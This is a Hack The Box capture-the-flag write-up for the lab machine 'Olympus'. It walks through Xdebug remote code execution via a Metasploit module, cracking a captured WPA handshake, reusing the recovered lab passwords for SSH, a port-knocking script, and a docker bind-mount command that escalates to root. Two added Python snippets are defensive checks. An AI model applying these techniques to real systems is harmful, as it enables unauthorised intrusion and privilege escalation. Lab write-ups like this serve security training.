Writeup: Hack The Box - Machines - Olympus

Description

  • Name: Olympus
  • IP: 10.10.10.83
  • Author: OscaAkaElvis
  • Difficulty: 5.3/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.83

22/tcp   filtered ssh
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
| 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)

Pwn

The web server serves only index.php with a photo of a Zeus statue, and dirsearch found nothing else, so we analysed the raw request and response:

GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 10.10.10.83
User-Agent: HTTPie/0.9.8


HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 224
Content-Type: text/html; charset=UTF-8
Date: Fri, 17 Aug 2018 16:45:48 GMT
Keep-Alive: timeout=5, max=100
Server: Apache
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5

<!DOCTYPE HTML>
<html>
<head>
<title>Crete island - Olympus HTB</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<link rel="shortcut icon" href="favicon.ico">
<link rel="stylesheet" type="text/css" href="crete.css">
</head>
<body class="crete">
</body>
</html>

We saw that the Xdebug header was set (version 2.5.5).

Xdebug is a PHP extension used during development to debug applications: set breakpoints, inspect variables and objects, and execute code from the developer's machine.

Because that debugger is reachable from outside, the same capability lets us use the Xdebug session to inject code and start a Meterpreter session.

Metasploit has a module, exploit/unix/http/xdebug_unauth_exec, that initiates an XDEBUG_SESSION and uploads the code that downloads the Meterpreter stage.
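As an added example (not code from the writeup), the check a release review would run over a captured response such as the one above: parse the headers and flag anything that advertises a debugging component, which is exactly how the Xdebug clue surfaced here.

```python
"""Added example (not from the original writeup): parse a captured HTTP
response and flag headers that advertise a debugging component, the
clue (Xdebug: 2.5.5) that gave away the foothold on this box."""
from typing import Dict, List, Tuple

# Constructed sample: the response captured on the page, trimmed to the headers.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Server: Apache\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Frame-Options: sameorigin\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Xdebug: 2.5.5\r\n"
    "\r\n"
    "<!DOCTYPE HTML>\n<html></html>\n"
)

# Response headers that only development tooling emits; any of them reaching a
# client means a debugger or profiler is loaded on a production server.
DEBUG_HEADERS = ("xdebug", "x-debug-token", "x-debug-token-link")


def parse_response(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into status line, header map and body.
    Header names are lower-cased so lookups are case-insensitive; the first
    blank line (CRLF or bare LF) ends the header block."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = lines[0] if lines else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Findings a pre-release header check would report for this response."""
    findings: List[str] = []
    for name in DEBUG_HEADERS:
        if name in headers:
            findings.append(f"{name} header exposed (value {headers[name]!r})")
    # A bare product name ("Apache") is fine; a version number is a disclosure.
    server = headers.get("server", "")
    if any(ch.isdigit() for ch in server):
        findings.append(f"server version disclosed ({server!r})")
    return findings
```

For the captured response the only finding is the Xdebug header; the Server header carries no version and passes.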

In this machine there is only one user with a home directory: zeus.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
zeus:x:1000:1000::/home/zeus:/bin/bash

But we also discovered that the Apache web service runs in a Docker container: the machine's IP address was in the 172.20.0.0 subnet, and LinEnum found the following:

10:cpuset:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
9:devices:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
8:blkio:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
7:perf_event:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
6:memory:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
5:net_cls,net_prio:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
4:freezer:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
3:cpu,cpuacct:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
2:pids:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
1:name=systemd:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
-rwxr-xr-x 1 root root 0 Apr 8 17:50 /.dockerenv
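As an added example (not code from the writeup), the two clues LinEnum reported above turned into a small check that decides whether a shell is inside a Docker container and which one; the regex also accepts the cgroup v2 systemd layout (docker-<id>.scope), which goes beyond the v1 paths shown on this page.

```python
"""Added example (not from the original writeup): decide whether a shell is
inside a Docker container from the two clues LinEnum reported on the page,
the /docker/<id> cgroup paths and the /.dockerenv marker file."""
import re
from typing import List, NamedTuple, Optional

# Constructed sample mirroring the cgroup v1 lines from the page (two of ten shown).
CONTAINER_CGROUP = (
    "10:cpuset:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9\n"
    "1:name=systemd:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9\n"
)
# Constructed sample of what a plain (non-container) host typically shows instead.
HOST_CGROUP = "10:cpuset:/\n1:name=systemd:/user.slice/user-1000.slice/session-2.scope\n"

# Docker names a container's cgroup after its 64-hex-digit id; accept both the
# classic /docker/<id> layout and the cgroup v2 systemd-driver form docker-<id>.scope.
DOCKER_ID = re.compile(r"(?:/docker/|docker-)([0-9a-f]{64})")


class ContainerCheck(NamedTuple):
    in_container: bool
    container_id: Optional[str]
    evidence: List[str]


def container_id_from_cgroup(text: str) -> Optional[str]:
    """Extract the container id from /proc/self/cgroup contents, or None."""
    for line in text.splitlines():
        # cgroup format: hierarchy-id:controller-list:path (the path may contain ':')
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        match = DOCKER_ID.search(parts[2])
        if match:
            return match.group(1)
    return None


def check_container(cgroup_text: str, dockerenv_present: bool) -> ContainerCheck:
    """Combine both clues: either alone is enough to conclude we are in a
    container, but only the cgroup path tells us which container."""
    evidence: List[str] = []
    cid = container_id_from_cgroup(cgroup_text)
    if cid:
        evidence.append(f"cgroup path names docker container {cid[:12]}")
    if dockerenv_present:
        evidence.append("/.dockerenv exists")
    return ContainerCheck(bool(evidence), cid, evidence)
```

On a live system the inputs are the contents of /proc/self/cgroup and os.path.exists("/.dockerenv").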

The tool also found a Dockerfile in Zeus's home directory: /home/zeus/airgeddon/Dockerfile.

In Zeus's home directory we found a copy of airgeddon, a tool used to intercept and capture WPA/WPA2 handshakes.

In the captured folder we found a captured.cap file that could contain an encrypted handshake for a Wi-Fi network.

We downloaded the file, converted it with cap2hccapx and used hashcat to crack the Wi-Fi password.

We got the SSID Too_cl0se_to_th3_Sun and the Wi-Fi password flightoficarus; from then on we expected more Greek mythology names and gods to turn up in the next steps.

We tried to log in as zeus and icarus with the Wi-Fi password, but what worked was an SSH login on port 2222 with the username icarus and the SSID Too_cl0se_to_th3_Sun as the password.

With the help of the gods (Athena, in this case) we got a domain name: ctfolympus.htb.

Using drill to ask the Bind server on port 53 for the domain's TXT record, we got another hint.

The hint clearly states that, to log in as the prometheus user with password St34l_th3_F1re!, we need to knock on ports 3456, 8234 and 62431, in that order, to open the SSH port (22, the one nmap reported as filtered).

#!/usr/bin/env zsh
# Knock on the given ports in order: ./knock.sh HOST PORT [PORT ...]
# One probe per port; --max-retries 0 keeps nmap from sending the SYN twice.

HOST=$1
shift
for ARG in "$@"; do
    nmap -Pn --max-retries 0 -p "$ARG" "$HOST"
done

With this simple script we used nmap to hit the ports in sequence, then waited for SSH on port 22 to prompt for the user's password.

On the Olympus machine itself we found the first flag and another message.

From LinEnum and ps aux | grep root we found that this machine owns all the Docker containers behind ports 80, 53 and 2222 (Apache, Bind and SSH). Together with the hint (serve), this suggested using Docker to escalate from prometheus to root, since the user could run docker commands.

Hijacking the running containers did not let us read the root flag, even though the user inside the container was root: the container's local volume gave no access to the host's files (as it should be!).

We then wrote a Dockerfile extending a local image (there is no access to external resources such as Docker Hub) in order to mount the /root folder.

FROM crete

VOLUME /root

With docker build . -t dodo we created the image; to run the container with the host's /root bind-mounted, we issued:

docker run -v /root:/root -t dodo cat /root/root.txt